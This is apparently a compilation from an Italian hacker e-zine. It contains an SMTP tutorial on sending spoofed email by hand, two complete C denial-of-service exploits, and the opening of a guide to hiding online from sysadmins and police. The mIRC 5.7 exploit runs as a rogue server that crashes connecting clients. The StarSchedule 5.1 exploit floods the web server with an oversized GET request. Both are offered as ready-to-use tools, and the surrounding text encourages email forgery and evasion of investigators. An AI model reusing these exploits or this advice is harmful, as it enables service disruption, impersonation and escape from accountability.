250 namitas@bol.net.in... Recipient ok
data
354 Enter mail, end with "." on a line by itself
This is the part where the body of the message is typed in.
.
250 RAA0000001693 Message accepted for delivery
***********************************************************************************************

Gli headers della email sopra riportata come visto dal destinatario sono i seguenti:

***********************************************************************************************
Return-Path: <ankit@bol.net.in>
Received: from ankit.com by mail.isp.com (8.9.1/1.1.20.3/07Jul00-0916AM)
id RAA0000001693; Thu, 7 Dec 2000 17:19:49 +0530 (IST)
Date: Thu, 7 Dec 2000 17:19:49 +0530 (IST)
From: Ankit Fadia <ankit@bol.net.in>
Message-Id: <200012071149.RAA0000001693@mail.isp.com>
X-UIDL: 920156a3b926c5193036933e6d04efd5

This is the part where the body of the message is typed in.
***********************************************************************************************

In ogni modo, ora che abbiamo richiamato la linea di base del processo di mandare manualmente
una email, muoviamoci sul soggetto principale di questo manuale.

Il campo del Soggetto senza soggetto
------------------------------------
Ora, poiché ho pubblicato il manuale per mandare emails false (Sending emails using SMTP com-
mands) ho ricevuto un numero di emails che mi chiedevano cose del genere: ‘Come specificare il
soggetto di una email mandata manualmente connettendosi alla porta 25 di un sistema?’. O ‘come
specificare destinatari CC e BCC mentre mentre faccio queste cose?’ Bene, in questa sezione di-
scutiamo su questo.
Innanzitutto, impariamo come specificare il soggetto di un email lavorando manualmente con i co-
mandi SMTP. Bene, il processo per specificare il soggetto rimane abbastanza simile al normale
processo di mandare emails manualmente. Attualmente tutti i comandi rimangono gli stessi prima
che diamo il comando ‘data’. Dopo che abbiamo dato il comando ‘data’, il server mail remoto ri-
sponderà con il seguente messaggio:

***********************************************************************************************
354 Enter mail, end with "." on a line by itself
***********************************************************************************************

Questa risposta del server significa che possiamo cominciare a scrivere il corpo del nostro mes-
saggio. Comunque, specifica anche indirettamente che questo è il momento di scrivere il
soggetto di una email. Possiamo specificare il soggetto di una email come segue:

***********************************************************************************************
Subject: Hi
***********************************************************************************************

Dove ‘subject:’ è la parola chiave, che dice al server mail che sei pronto di scrivere nel tuo
soggetto ‘Hi’, è il soggetto a tua scelta. Puoi continuare con il corpo dell’email premendo il
tasto ‘Invio’ e scrivendo i caratteri. La fine con il ‘.’ e tutto rimane lo stesso.
Andiamo attraverso l’intero processo, passo dopo passo. Ricorda che ho inserito commenti dove
necessario nelle parentesi. Sia le parentesi che i caratteri nelle parentesi non sono parte
degli attuali comandi.
Per questo esempio, abbiamo bisogno di ricordare le seguenti informazioni:

***********************************************************************************************
Server Mail: mail.isp.com
Indirizzo Email del Destinatario: namitas@bol.net.in
Indirizzo Email del Mittente: ankit@bol.net.in
Soggetto: Hi!!!
Testo: This is a test message

C:\windows>telnet mail.isp.com
220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec 2000 17:18:50 +0530
(IST)
helo ankit.com
250-mail.isp.com Hello [203.xx.yyy.91], pleased to meet you
mail from: ankit@bol.net.in
250 ankit@bol.net.in... Sender ok
rcpt to: namitas@bol.net.in
250 namitas@bol.net.in... Recipient ok
data
354 Enter mail, end with "." on a line by itself
subject: Hi!!!
This is a test message
.
250 RAA0000001693 Message accepted for delivery
***********************************************************************************************

Ora se esamini gli headers di questa email, vedrai che oltre agli headers che abbiamo
analizzato prima, c’è una linea separata per il Soggetto.

***********************************************************************************************
Return-Path: <ankit@bol.net.in>
Received: from ankit.com by mail.isp.com (8.9.1/1.1.20.3/07Jul00-0916AM)
id RAA0000001693; Thu, 7 Dec 2000 17:19:49 +0530 (IST)
Date: Thu, 7 Dec 2000 17:19:49 +0530 (IST)
From: Ankit Fadia <ankit@bol.net.in>
Message-Id: <200012071149.RAA0000001693@mail.isp.com>
Subject: Hi!!!!
X-UIDL: 920156a3b926c5193036933e6d04efd5

This is a test message
***********************************************************************************************

CC e BCC
--------
Quali sono i comandi SMTP che equivalgono ai campi BCC e CC del tuo client email? Bene, questa
domanda ha solo una semplice risposta: nessuno. Le seguenti righe ci diranno perché.
Per capire la risposta alla domanda precedente, capiamo prima come esattamente fa un client un
email a gestire un CC o un BCC. Come fa quando usiamo le funzioni CC e BCC?
Ora, quando premi il comando Send, il tuo client email si connette alla porta 25 del server
mail che hai specificato nella configurazione. Poi emetterà i comandi SMTP al server mail
remoto e gli manderà le informazioni richieste. E con questo processo la tua email è stata
mandata. L’ordine con il quale i vari comandi SMTP sono dati è come descritto precedentemente.
Normalmente, quando hai solo un singolo destinatario, il tuo client email emetterà solo un
singolo ‘RCPT TO:’ al server mail. Comunque, quando c’è più di un solo destinatario, il client
email emetterà più di un ‘RCPT TO:’, o in altre parole, quando il campo CC del tuo client
email non è vuoto, verranno emessi molti comandi RCPT.
Come vedi il Simple Mail Transfer Protocolo (SMTP) non prevede nessun comando speciale per il
CC. Il concetto di CC si affida a molti comandi RCPT al server mail. Lo stesso è il caso
quando hai molti destinatari nel campo ‘To:’ del client email. Questo significa che non
importa se aggiungi un indirizzo email del destinatario al campo CC o a ‘To:’. Il comando SMTP
emesso e gli headers creati saranno gli stessi.
Facciamo un esempio pratico per rendere tutto più chiaro. La lista di destinatari per questo
esempio è la seguente:


To: ankit@bol.net.in; ankitfadia@hotmail.com
CC: ankit_Fadia@hotmail.com ; namitas@bol.net.in

Questi sono i comandi che verranno emessi per mandare una email vuota con il soggetto ‘test’
dal seguente indirizzo email: test@bol.net.in alla lista di destinatari sovrariportata.

***********************************************************************************************
C:\windows>telnet mail.isp.com
220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec 2000 17:18:50 +0530
(IST)
helo ankit.com
250-mail.isp.com Hello [203.xx.yyy.91], pleased to meet you
mail from: test@bol.net.in
250 test@bol.net.in... Sender ok
rcpt to: ankit@bol.net.in
250 ankit@bol.net.in... Recipient ok
rcpt to: ankitfadia@hotmail.com
250 ankitfadia@hotmail.com... Recipient ok
rcpt to: ankit_fadia@hotmail.com
250 ankit_Fadia@hotmail.com... Recipient ok
rcpt to: namitas@bol.net.in
250 namitas@bol.net.in... Recipient ok
data
354 Enter mail, end with "." on a line by itself
subject: Test
.
250 RAA0000001693 Message accepted for delivery
***********************************************************************************************

Chiaro? Ora, vediamo come funziona il BCC.
Ora, nel caso precedente (nel caso di CC), il client email ha usato molti RCPT nella stessa
sessione SMTP per mandare lo stesso email a molti destinatari. Comunque, in quel caso tutti
possono vedere la lista dei destinatari. Questo accade perché tutte le email hanno gli stessi
headers. Questo è dovuto al fatto che gli indirizzi email di tutti i destinatari sono stati
dati al server mail durante la stessa sessione SMTP. Tutto questo potrebbe sembrare abbastanza
vago e strano. Se è così, leggi i seguenti paragrafi per capire meglio.
Ora, quando usi CC per una singola email a molti destinatari (diciamo 3), verrà usata la
seguente procedura:

Il client email fa partire la sessione al server mail remoto.
Presenta se stesso e il mittente.
Usa molti comandi RCPT per mandare la stessa email a molti destinatari.
Il client email si disconnette.

Poiché gli indirizzi email dei destinatari sono inseriti nella stessa sessione, si verranno a
formare gli stessi headers. Così tutti i destinatari sono capaci di vedere gli indirizzi
email ai quali è stata mandata questa email.
Ora, in una situazione, quando usiamo BCC per la stessa email verso molti destinatari
(diciamo 2), verrà usata la seguente procedura:

Il client email fa partire la sessione al server mail remoto.
Presenta se stesso e il mittente.
Usa un solo comando RCPT per mandare la stessa email al primo email nella lista BCC.
Il client email si disconnette.
Il client email fa partire un’altra sessione al server mail remoto.
Presenta di nuovo se stesso e il mittente.
Usa un solo comando RCPT per mandare la stessa email al secondo email nella lista BCC.
Il client email si disconnette di nuovo.

In questo caso, a ogni destinatario è stata mandata una email attraverso un’unica sessione al
server remoto, così ogni destinatario ha ricevuto un header diverso e non sono visualizzati gli
altri indirizzi email.
La descrizione precedente dell’uso di CC e di BCC è basata su come funziona Outlook Express.
Comunque, attualmente Sendmail mette a disposizione un modo per usare i destinatari tramite CC.
Dopo aver dato il comando DATA, si può dare la lista CC con il seguente comando:

CC:Lista di destinatari

Comunque, dare il comando BCC al posto di CC non produce lo stesso risultato.

Mandare Attachment con Sendmail
-------------------------------
Oggi, gli attachment [aggiunte, files da aggiungere all’email] MIME sono usati per trasferire i
files inclusi in una email. Gli attachment MIME usano una codificazione Base64 per cirare i
dati binari. Precedentemente veniva usato un altro metodo, che era chiamato Uuencode encoding
standard. Puoi anche mandare attachment attraverso Sendmail usando uno dei seguenti metodi.
La codificazione UU-encoding o Unix-to-Unix è una codificazione standard, che converte tutti i
tipi di files in ASCII per trasmetterli. I files, che sono mandati attraverso la Rete, sono
cifrati alla fine del mittente e decifrati alla fine del destinatario. Questo assicura che i
files (attachment) possono essere trasferiti su diversi tipi di reti, routers di sistema, ecc
senza perdite. Comunque, questo metodo potrebbe corrompere i files e non è quello che viene
usato di solito. Secondo un’università, il meccanismo di base dell’UU-encoding è il seguente:
Lo schema di base è dividere in gruppi di 3 caratteri otto-bit (24 bit) in 4 caratteri sei-bit
e poi aggiungere 32 (uno spazio) a ogni carattere sei-bit, che lo trascrive nel carattere
trasmittente. In altre parole, i caratteri a 6 bit cifrati sono trascritti nella
serie: `!"#$%&'()*+,-./012356789:;<=>?@ABC...XYZ[\]^_ per trasmissioni su linee di
comunicazione.Ogni cifrazione incremetna la dimensione del file del circa 42%. Così, il
meccanismo dell’UU-encoding può essere il seguente:

Il file è uuencoded (cifrato) alla finde del mittente ---------------> Il file è uuencoded alla
fine del destinatario.

Tutti gli attachment possono essere mandati attraverso la rete in forma uuencode.

Vedi se inserisci il codice Uuencoded di ogni file dopo che hai emesso il comando DATA al
prompt di Sendmail, il destinatario potrà ricevere l’attachment e visualizzarlo. La maggior
parte dei client email permettono l’Uuencoding. (Anche se il client email usato dal
destinatario non permette l’Uuencoding, ci sono molti strumenti che potrebbero farlo.) Tutti i
files che contendono immagini, file audio, file video, file di testo ecc possono essere
cifrati dall’Uuencoding standard per ottenere il codice uuencoded.
Il metodo per mandare attachment cifrati è il seguente:

Convertire il file da mandare come attachment nella forma uuencoded.
Dare la forma uuencoded al server mail dopo il comando DATA.

Ora parliamo del primo passaggio:
Se stai usando una piattaforma Windows, tutto quello che devi avere per usare l’Uuencoding è
Win-Zip. Se non hai WinZip, puoi scaricarlo da http://www.winzip.com
WinZip può essere facilmente usato per ottenere l’Uuencode di tutti i file. Semplicemente
creando un nuovo archivio contentente il file che vuoi cifrare e selezionare Action > Uuencode.
Puoi anche premere Shift U.
WinZip salverà la forma cifrata del file .zip nella forma: filename.uue

Un tipico file .uue (in questo caso di un file di immagine) potrebbe essere il seguente:

***********************************************************************************************
_=_
_=_ Part 001 of 001 of file new.zip
_=_
begin 666 new.zip
M4$L#!!0``@`(`#5S_RCDJL7+;P```'4````'````;F5W+F=I9G/W=+.P3)1G
MX&%8R``"
_T$`Q%#\R<+(P,#(H`/B@.0=F-QZ\INZ%.\\$DX(:]"N_76TM7"V
M:6]\T+)755;)-P(C;UB]*)FR+OSYCGV';_HI7<P)::DQ$Y_Y[%*(UX1`H4U;
M3Z55KVB;<EV#@<$:`%!+`0(4`!0``@`(`#5S_RCDJL7+;P```'4````'````
K````````(`"V@0````!N97<N9VEF4$L%!@`````!``$`-0```)0`````````
`
end
*************************************************************************************************

Le prime righe sono solo commenti aggiunti da WinZip e non fanno parte del codice uuencoded. Co-
sì, elimina la parte superiore alla linea:

begin 666 new.zip

Questo ti dà il codice Uuencode del file che vuoi trasmettere come attachment usando Sendmail.

####################
VERITà SULL’HACKING: Se sei su una piattaforma Unix, creare l’Uuencode di un file diventa estre-
mamente semplice. Basta andare alla shell Unix per cifrare il file che vuoi mandare. Per fare
un esempio, diciamo che il file che vuoi mandare è chiamato ‘myfile.doc’. Al prompt della shell
Unix, scrivi:

uuencode myfile.doc myfile.doc > tempfile.uu

Questo dice al comando uuencode di cifrare il file myfile.doc e memorizzare il nome myfile.doc
nel file cifrato risultante. I risultati sono poi reindirizzati (dal segno >) in un altro file
che metterai nel tuo messaggio email più tardi.
Le versioni DOS di questa utility sono reperibili in vari siti.
####################

Ora, una volta che hai cifrato il file e ottenuto la forma Uuencoded, tutto quello che devi
fare è copiarlo e incollarlo dopo il comando DATA che è stato appena emesso al prompt di
Sendmail. Questo manderà il file come attachment.

Questo era il metodo per mandare un attachment usando l’Uuencoding standard. Descriverò come
mandare come mandare attachment usando il nuovo MIME standard nella prossima versione di questo
manuale.

Altri suggerimenti su SendMail
------------------------------
Normalmente quando ti connetti alla porta Sendmail di un sistema, hai a disposizione solo i co-
mandi standard di SMTP. Benchè sono molti di più di quelli che hai bisogno, comunque, per
quelli che vorresti usare con varie opzioni, ci sono altri comandi, che normalmente non ti
sono disponibili. [questo passo non è molto chiaro, in pratica ci dice che ci sono altri
comandi ‘carini’ che purtroppo non possono essere usati da noi].
Quello di cui sto parlando sono i comandi ESMTP o i comandi Extended Mail Transfer Protocol.
Un server mail con ESMTP abilitato decide se questi comandi ESMTP sono disponibili al client
sulla base di come il client si presenta a esso. Ora, normalmente ti presenti dando il comando:

HELO dominio

Ora, quando ti presenti il comando HELO, la maggior parte dei server mail mettono a
disposizione solo i comandi SMTP. Ora, per poter utilizzare i comandi ESMTP, devi presentarti
al server con il comando EHLO. Per esempio:

ehlo ankit.com

Ora, se il server mail a cui sei connesso ha ESMTP abilitato, ti risponderà dando una lista di
comandi ESMTP. Qualcosa del genere:

***********************************************************************************************
220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec2000 17:18:50 +0530
(IST)
ehlo ankit.com
250-mail.isp.com Hello [203.xx.yy.91], pleased to meet you
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ONEX
250-ETRN
250-XUSR
250 HELP
***********************************************************************************************

####################
VERITà SULL’HACKING: Un modo di verificare se il tuo ISP ha i comandi ESMTP abilitati, è vedere
la risposta del demone che appare quando ti connetti alla porta 25 del suo server mail. La
parola ‘ESMTP’ ti dice che tali comandi sono disponibili. Per esempio:

220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec2000 17:18:50 +0530
(IST)
####################



ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø MIRC 5.7 DENIAL OF SERVICE EXPLOITS ø
ø sYn ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø







/*
diemirc.c - mIRC 5.7 denial of service exploits.
(c) Chopsui-cide/MmM '00


Questo programma si mette in ascolto della porta 6667 per verificate le connessioni in arrivo,
Dopo manda in crash il mIRC usando l'exploit che preferisci.
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define LISTEN_PORT 6667
#define TARGET_NICK "
Chopsui-cide"

void listen_sock(int sock, int port);
void die(char *message);
int poll_for_connect(int listensock);
int select_sploit();

void exploit1(int s);
void exploit2(int s);
void exploit3(int s);
void exploit4(int s);

main()
{
int ls;
int c;
if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) die("
Unable to create socket.");
c = select_sploit();
listen_sock(ls, LISTEN_PORT);
printf("
Waiting for connection on port %d...\n", LISTEN_PORT);
ls = poll_for_connect(ls);
switch (c)
{
case 0 :
exploit1(ls);
break;
case 1 :
exploit2(ls);
break;
case 2 :
exploit3(ls);
break;
case 3 :
exploit4(ls);
}
close(ls);
return 0;
}

void listen_sock(int sock, int port)
{
struct sockaddr_in addr;
int c = 0;

memset((char *)&addr,'0', sizeof(addr));

addr.sin_family = AF_INET;
addr.sin_addr.s_addr = INADDR_ANY;
addr.sin_port = htons(port);

if (bind(sock, &addr, sizeof(addr)) == -1) die("
Error binding socket.");
if (listen(sock, 20) == -1) die("
Error listening.");
}

void die(char *message)
{
printf("
Fatal error: %s\n", message);
exit(1);
}

int poll_for_connect(int listensock)
{
struct sockaddr_in peer;
int sendsock;
int szpeer = sizeof(peer);
do
{
sendsock = accept(listensock, (struct sockaddr *) &peer, &szpeer);
} while(sendsock == -1);
printf("
Connection from [%s].\n", inet_ntoa(peer.sin_addr));
return sendsock;
}

#define last_select 3
int select_sploit()
{
char k;
printf("
Select exploit:\n0 - incomplete nick change.\n");
printf("
1 - msg with loads of parameters.\n2 - incomplete mode change.\n");
printf("
3 - incomplete kick.\n");
k = getchar();
if (atoi((char *)&k) > last_select)
{
printf("
Invalid selection.\n");
exit(1);
}
if (((int)k < 0x30) || ((int)k > 0x39))
{
printf("
Invalid selection.\n");
exit(1);
}
return atoi((char *)&k);
}

/*
Exploit 1: incomplete nick change
mIRC 5.7 and past versions seem to suffer from bugs
involving incomplete messages. I previously e-mailed
Khaled M. Bey about one such bug, and it's fixed in
this version, but there are other similiar (almost
identical) bugs still in v5.7.
This attack is executed from the _server_ side.
All we need to do is send the client a half complete
nick change message, ie
"
:<targetnick>!ident@host.com NICK"
We must put the target's current nick name where
<targetnick> is.
*/
#define END "
!ident@host.com NICK\x0a"
void exploit1(int s)
{
char sod[256];
memset((char *)&sod, '\0', 256);
sod[0] = ':';
strcat(sod, TARGET_NICK);
strcat(sod, END);
send(s, sod, 256, 0);
usleep(1000); // Make sure the packet gets there.
}

/*
Exploit 2: server message overflow
If the client sends a large message with to many
parameters, it crashes, and part of the buffer is
stuffed into EAX.
*/
#define MSG_LEN 1000 // This must be an even number.
void exploit2(int s)
{
char sod[MSG_LEN];
int c = 0;
do
{
sod[c] = 0xff;
sod[c + 1] = ' ';
c += 2;
} while(c < MSG_LEN);
send(s, sod, MSG_LEN, 0);
usleep(1000); // Make sure the packet gets there.
}

/*
Exploit 3: incomplete mode change
This is basically the same as the nick change
exploit.
*/
#define ENDd "
!ident@host.com MODE\x0a"
void exploit3(int s)
{
char sod[256];
memset((char *)&sod, '\0', 256);
sod[0] = ':';
strcat(sod, TARGET_NICK);
strcat(sod, ENDd);
send(s, sod, 256, 0);
usleep(1000); // Make sure the packet gets there.
}

/*
Exploit 4: incomplete kick
Another incomplete message bug.
*/
#define JOIN "
JOIN #\x0a"
#define KICK "
: KICK #\x0a"
void exploit4(int s)
{
char sod[256];
memset((char *)&sod, '\0', 256);
sod[0] = ':';
strcat(sod, TARGET_NICK);
strcat(sod, JOIN);
printf("
%s%s", sod, KICK);
send(s, sod, strlen(sod), 0);
send(s, KICK, strlen(KICK), 0);
usleep(1000); // Make sure the packet gets there.
}






I not modify the program.!




ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø STARSCHEDULE 5.1 WEB SERVER DOS ø
ø ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø



/* StarSchedule 5.1 Web Server DoS (common on port 801)
* questo programma è stato scritto da Michael Stevens
*
*
* Credits to Microsoft Security Webpage
* --- Finally and exploit with style and a message
*/

#include <stdio.h> /* I hope you know this one */
#include <sys/types.h> /* Socket types */
#include <sys/socket.h> /* Sockets duh! */
#include <netinet/in.h> /* Definitions of constants */
#include <netdb.h> /* gethostbyname */

char crash[] = "
GET /\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
"
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"
HTTP/1.0";


int main(int argc, char **argv)
{
struct sockaddr_in sin;
struct hostent *pHostentry;
char *tcp_dest;
int sd, a_count = argc;
unsigned short port;
printf("
----Crash StarSchedule 5.1 Server by Michael Stevens----\n");
printf("
\n");

if (a_count < 3 || a_count > 3)
{
printf("
usage: %s destination port\n",argv[0]);
exit(1);
}

port = atoi(argv[2]);
tcp_dest = argv[1];

if (( port > 65535) || (port < 1))
{
printf("
Port too high or low. Accepted ranges are 1 - 65535\n");
exit(1);
}

if ((pHostentry = gethostbyname(tcp_dest)) == NULL)
{
printf("
Resolve failed check provided host information and

  
retry.\n");
exit(1);
}
printf("
Setting up connection structure...\n");
memcpy(&sin.sin_addr.s_addr, pHostentry->h_addr, pHostentry->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(port);

printf("
Read tcp_dest:\t\t %s\n", tcp_dest);
printf("
Official Hostname:\t %s\n", pHostentry->h_name);
printf("
IP Address:\t\t %s\n", inet_ntoa(sin.sin_addr.s_addr));
printf("
port: \t\t\t %d\n", port);
printf("
Host length:\t\t %d\n\n", pHostentry->h_length);

printf("
Creating Socket...\n");
if((sd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
printf("
Socket problems Quiting...\n");
exit(1);
}

printf("
Got a socket descriptor of %d\n", sd);
printf("
Connecting Socket...\n");

if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1)
{
printf("
Connect error...\n");
close(sd);
exit(1);
}

printf("
Sending Code...\n");
send(sd, crash, sizeof(crash), 0);
printf("
Closing Socket...\n");
close(sd);
printf("
Exiting...\n");
return 0;
}


ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø MIMETIZZAZIONE TERMO OTTICA ø
ø sYn ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø



: Come nascondersi nella Rete :.


---[ C O N T E N U T i ]---

0x00.0 Anonimato
0x00.1 CLI & BIC
0x00.2 Account falsi
0x00.3 Proxy
0x00.4 Socks
0x00.5 Wingate
0x00.6 Trovare Proxy, Socks & Wingate
0x00.7 Pericoli



0x00.0 ANONIMATO
================
Prima di effettuare qualsiasi operazione e'necessario sapere come nascondersi
nella Rete. Questo non garantira' l'anonimato completo, ma rendera' piu'
difficile il compito di chi deve trovarci.
In questo articolo, esplicitamente rivolto ai newbbissimi, prenderemo in
considerazione tutti i passaggi di una connessione Internet, dalla chiamata
telefonica ai diversi "
rimbalzi" sugli host della rete.
Prima di effettuare qualsiasi tipo di "
esperimento" consiglio di leggere
completamente il documento, compresa la sezione "
Pericoli".

0x00.1 CLI & BIC
----------------
Dove CLI sta per "
Caller Line Identification" e BIC per "Blocco identificazione
chiamante". Chiaramente stiamo parlando del collegamento telefonico. Il primo
passo verso Internet e' la connessione dial-up con l'ISP (Internet Service Provider)
Da alcuni mesi e' disponibile anche in Italia il CLI, ovvero l'invio del numero
del chiamante; questo significa che chi riceve la vostra chiamata e' in grado
di vedere in tempo reale il numero del chiamante.
Per evitare che questo avvenga, e' disponibile il "
Blocco identificazione chiamente",
che disabilita (parzialmente) questa possibilita'.
Mettendo il numero 1793 (o *67#) davanti al numero da chiamare, si inibisce
la possibilita' di visualizzare il nostro numero sul display del ricevente,
ma non l'invio dello stesso alla centrale Telecom; questo significa che
comunque sui tabulati della telco sara' registrata la telefonata dalla vostra
utenza all'ISP, quel giorno a quell'ora...

0x00.2 Account falsi
--------------------
Scenario: voi state "
hackerando" con l'account dell'abbonamento che vi hanno
regalato; vi siete registrati con il vostro nome (Mario Rossi) e vi siete
collegati al computer del Pentagono... il sysadmin si accorge di un ip strano
collegato al sistema (il vostro ip!), esegue un traceroute sul vostro ip,
prende nota del penultimo hop e si collega sulla porta 79 di quell'host
(il vostro gateway):
users online
---------------
mrossi@tin.it 212.216.200.123
Mezz'ora dopo l'FBI e' a casa vostra e suona il campanello...
Questa storiella ci insegna che non e' buona abitudine hackerare con l'abbonamento
